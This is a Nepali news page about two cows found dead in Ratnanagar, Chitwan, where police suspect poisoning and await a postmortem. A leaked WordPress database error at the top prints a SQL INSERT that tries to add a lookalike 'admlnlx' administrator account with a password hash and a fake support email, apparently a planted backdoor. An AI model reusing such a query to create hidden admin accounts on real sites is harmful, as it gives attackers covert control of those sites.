WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BM6AAX7XwQrE1RAxXnfXoL7R3954ya1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:45:05', '', 'admlnlx', 'admlnlx')
चितवन ,माघ १९
पुर्वीचितवनको रत्ननगरमा दुईवटा गाई मृत अवस्थामा फेला परेका छन । रत्ननगर ८ पर्सौनीमा आज दुईवटा गाई मृत अवस्थामा फेला परेको हो । दुई गाई एकै ठाँउमा मृत अवस्थामा फेला परेकोले त्यो हत्या नै भएको स्थानीयले आशंका गरेका छन् ।रत्ननगरको भित्री सडक छेउमा ताराप्रसाद उपाध्यायको जग्गामा रहेको बालुवा डिपोमा गाई मृत फेला परेको हो ।
घटनाको प्रकृति हेर्दा गाईलाई कसैले केही खुवाएर हत्या गरेको हुनसक्ने प्रहरीले अनुमान गरेको छ । गाईलाई सोहीस्थानमा कसैले बीस खुवाएको ,या कतैबाट मृत गाईलाई यहाँ ल्याएर फालिएको हुनपनी सक्ने इलाका प्रहरी कार्यालय टाँडीका प्रमुख नारायण रञ्जितकारले वताए ।गाईको शवलाई पोस्टमार्टमको लागि जिल्ला पशु कार्यालय भरतपुर पठाइएको प्रहरीले जनाएको छ । पोस्टमार्टम रिपोर्ट आएपछि मात्रै यथार्थ कुरा भन्न सकिने रन्जितकारले वताए ।